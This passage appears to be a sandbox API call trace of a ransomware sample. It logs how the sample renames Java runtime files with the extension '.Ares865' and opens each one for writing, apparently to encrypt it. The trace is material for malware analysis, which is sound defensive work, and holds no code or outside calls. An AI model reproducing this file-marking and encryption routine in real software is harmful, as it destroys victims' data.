param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll.Ares865") returned 60 [0137.895] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll.ares865"), dwFlags=0x1) returned 1 [0137.897] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.897] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=242600) returned 1 [0137.935] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javafx-iio.dll" | out: lpString1="javafx-iio.dll") returned="javafx-iio.dll" [0137.935] lstrlenW (lpString="javafx-iio.dll") returned 14 [0137.935] lstrlenW (lpString="Ares865") returned 7 [0137.935] lstrcmpiW (lpString1="iio.dll", lpString2="Ares865") returned 1 [0137.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll.Ares865") returned 59 [0137.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll.ares865"), dwFlags=0x1) returned 1 [0137.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=188328) returned 1 [0137.952] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javaw.exe" | out: lpString1="javaw.exe") returned="javaw.exe" [0137.952] lstrlenW (lpString="javaw.exe") returned 9 [0137.952] lstrlenW (lpString="Ares865") returned 7 [0137.952] lstrcmpiW (lpString1="vaw.exe", lpString2="Ares865") returned 1 [0137.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe.Ares865") returned 54 [0137.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe.ares865"), dwFlags=0x1) returned 1 [0137.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=175016) returned 1 [0137.967] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javaws.exe" | out: lpString1="javaws.exe") returned="javaws.exe" [0137.967] lstrlenW (lpString="javaws.exe") returned 10 [0137.967] lstrlenW (lpString="Ares865") returned 7 [0137.967] lstrcmpiW (lpString1="aws.exe", lpString2="Ares865") returned 1 [0137.967] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe.Ares865") returned 55 [0137.967] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe.ares865"), dwFlags=0x1) returned 1 [0137.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264616) returned 1 [0137.991] lstrcpyW (in: lpString1=0x2cce44a, lpString2="java_crw_demo.dll" | out: lpString1="java_crw_demo.dll") returned="java_crw_demo.dll" [0137.991] lstrlenW (lpString="java_crw_demo.dll") returned 17 [0137.992] lstrlenW (lpString="Ares865") returned 7 [0137.992] lstrcmpiW (lpString1="emo.dll", lpString2="Ares865") returned 1 [0137.992] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll.Ares865") returned 62 [0137.992] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll.ares865"), dwFlags=0x1) returned 1 [0137.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23976) returned 1 [0137.998] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jawt.dll" | out: lpString1="jawt.dll") returned="jawt.dll" [0137.998] lstrlenW (lpString="jawt.dll") returned 8 [0137.998] lstrlenW (lpString="Ares865") returned 7 [0137.998] lstrcmpiW (lpString1="awt.dll", lpString2="Ares865") returned 1 [0137.998] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll.Ares865") returned 53 [0137.998] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll.ares865"), dwFlags=0x1) returned 1 [0138.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14248) returned 1 [0138.004] lstrcpyW (in: lpString1=0x2cce44a, lpString2="JAWTAccessBridge-32.dll" | out: lpString1="JAWTAccessBridge-32.dll") returned="JAWTAccessBridge-32.dll" [0138.004] lstrlenW (lpString="JAWTAccessBridge-32.dll") returned 23 [0138.004] lstrlenW (lpString="Ares865") returned 7 [0138.004] lstrcmpiW (lpString1="-32.dll", lpString2="Ares865") returned -1 [0138.004] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll.Ares865") returned 68 [0138.004] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll.ares865"), dwFlags=0x1) returned 1 [0138.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JAWTAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawtaccessbridge-32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15272) returned 1 [0138.012] lstrcpyW (in: lpString1=0x2cce44a, lpString2="JdbcOdbc.dll" | out: lpString1="JdbcOdbc.dll") returned="JdbcOdbc.dll" [0138.012] lstrlenW (lpString="JdbcOdbc.dll") returned 12 [0138.012] lstrlenW (lpString="Ares865") returned 7 [0138.012] lstrcmpiW (lpString1="dbc.dll", lpString2="Ares865") returned 1 [0138.012] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll.Ares865") returned 57 [0138.012] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll.ares865"), dwFlags=0x1) returned 1 [0138.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45992) returned 1 [0138.021] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jdwp.dll" | out: lpString1="jdwp.dll") returned="jdwp.dll" [0138.021] lstrlenW (lpString="jdwp.dll") returned 8 [0138.021] lstrlenW (lpString="Ares865") returned 7 [0138.021] lstrcmpiW (lpString1="dwp.dll", lpString2="Ares865") returned 1 [0138.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll.Ares865") returned 53 [0138.022] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll.ares865"), dwFlags=0x1) returned 1 [0138.023] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=164776) returned 1 [0138.037] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfr.dll" | out: lpString1="jfr.dll") returned="jfr.dll" [0138.037] lstrlenW (lpString="jfr.dll") returned 7 [0138.037] lstrlenW (lpString="Ares865") returned 7 [0138.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll.Ares865") returned 52 [0138.038] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll.ares865"), dwFlags=0x1) returned 1 [0138.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20392) returned 1 [0138.047] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfxmedia.dll" | out: lpString1="jfxmedia.dll") returned="jfxmedia.dll" [0138.047] lstrlenW (lpString="jfxmedia.dll") returned 12 [0138.047] lstrlenW (lpString="Ares865") returned 7 [0138.047] lstrcmpiW (lpString1="dia.dll", lpString2="Ares865") returned 1 [0138.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll.Ares865") returned 57 [0138.047] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll.ares865"), dwFlags=0x1) returned 1 [0138.049] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxmedia.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxmedia.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.049] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=110504) returned 1 [0138.059] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfxwebkit.dll" | out: lpString1="jfxwebkit.dll") returned="jfxwebkit.dll" [0138.059] lstrlenW (lpString="jfxwebkit.dll") returned 13 [0138.059] lstrlenW (lpString="Ares865") returned 7 [0138.059] lstrcmpiW (lpString1="kit.dll", lpString2="Ares865") returned 1 [0138.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll.Ares865") returned 58 [0138.060] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll.ares865"), dwFlags=0x1) returned 1 [0138.061] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.061] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11893160) returned 1 [0138.245] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jli.dll" | out: lpString1="jli.dll") returned="jli.dll" [0138.245] lstrlenW (lpString="jli.dll") returned 7 [0138.245] lstrlenW (lpString="Ares865") returned 7 [0138.246] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll.Ares865") returned 52 [0138.246] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll.ares865"), dwFlags=0x1) returned 1 [0138.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jli.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jli.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.248] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=142760) returned 1 [0138.259] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jp2iexp.dll" | out: lpString1="jp2iexp.dll") returned="jp2iexp.dll" [0138.259] lstrlenW (lpString="jp2iexp.dll") returned 11 [0138.259] lstrlenW (lpString="Ares865") returned 7 [0138.259] lstrcmpiW (lpString1="exp.dll", lpString2="Ares865") returned 1 [0138.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll.Ares865") returned 56 [0138.260] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll.ares865"), dwFlags=0x1) returned 1 [0138.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=201640) returned 1 [0138.278] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jp2launcher.exe" | out: lpString1="jp2launcher.exe") returned="jp2launcher.exe" [0138.278] lstrlenW (lpString="jp2launcher.exe") returned 15 [0138.278] lstrlenW (lpString="Ares865") returned 7 [0138.278] lstrcmpiW (lpString1="her.exe", lpString2="Ares865") returned 1 [0138.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe.Ares865") returned 60 [0138.278] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe.ares865"), dwFlags=0x1) returned 1 [0138.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2launcher.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2launcher.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.281] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52648) returned 1 [0138.287] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jp2native.dll" | out: lpString1="jp2native.dll") returned="jp2native.dll" [0138.287] lstrlenW (lpString="jp2native.dll") returned 13 [0138.287] lstrlenW (lpString="Ares865") returned 7 [0138.287] lstrcmpiW (lpString1="ive.dll", lpString2="Ares865") returned 1 [0138.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll.Ares865") returned 58 [0138.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll.ares865"), dwFlags=0x1) returned 1 [0138.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2native.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2native.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16808) returned 1 [0138.293] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jp2ssv.dll" | out: lpString1="jp2ssv.dll") returned="jp2ssv.dll" [0138.293] lstrlenW (lpString="jp2ssv.dll") returned 10 [0138.293] lstrlenW (lpString="Ares865") returned 7 [0138.293] lstrcmpiW (lpString1="ssv.dll", lpString2="Ares865") returned 1 [0138.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll.Ares865") returned 55 [0138.293] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll.ares865"), dwFlags=0x1) returned 1 [0138.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=171944) returned 1 [0138.306] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpeg.dll" | out: lpString1="jpeg.dll") returned="jpeg.dll" [0138.306] lstrlenW (lpString="jpeg.dll") returned 8 [0138.306] lstrlenW (lpString="Ares865") returned 7 [0138.306] lstrcmpiW (lpString1="peg.dll", lpString2="Ares865") returned 1 [0138.306] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll.Ares865") returned 53 [0138.306] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll.ares865"), dwFlags=0x1) returned 1 [0138.308] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpeg.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpeg.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.308] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145832) returned 1 [0138.319] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpicom.dll" | out: lpString1="jpicom.dll") returned="jpicom.dll" [0138.319] lstrlenW (lpString="jpicom.dll") returned 10 [0138.319] lstrlenW (lpString="Ares865") returned 7 [0138.319] lstrcmpiW (lpString1="com.dll", lpString2="Ares865") returned 1 [0138.320] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll.Ares865") returned 55 [0138.320] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll.ares865"), dwFlags=0x1) returned 1 [0138.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpicom.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpicom.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.322] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93608) returned 1 [0138.330] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpiexp.dll" | out: lpString1="jpiexp.dll") returned="jpiexp.dll" [0138.330] lstrlenW (lpString="jpiexp.dll") returned 10 [0138.330] lstrlenW (lpString="Ares865") returned 7 [0138.330] lstrcmpiW (lpString1="exp.dll", lpString2="Ares865") returned 1 [0138.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll.Ares865") returned 55 [0138.330] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll.ares865"), dwFlags=0x1) returned 1 [0138.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpiexp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpiexp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=156072) returned 1 [0138.344] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jpinscp.dll" | out: lpString1="jpinscp.dll") returned="jpinscp.dll" [0138.344] lstrlenW (lpString="jpinscp.dll") returned 11 [0138.344] lstrlenW (lpString="Ares865") returned 7 [0138.344] lstrcmpiW (lpString1="scp.dll", lpString2="Ares865") returned 1 [0138.344] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll.Ares865") returned 56 [0138.344] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jpinscp.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jpinscp.dll.ares865"), dwFlags=0x1) returned 1 [0138.347] CreateFileW (lpFileName="C:\\Program Files 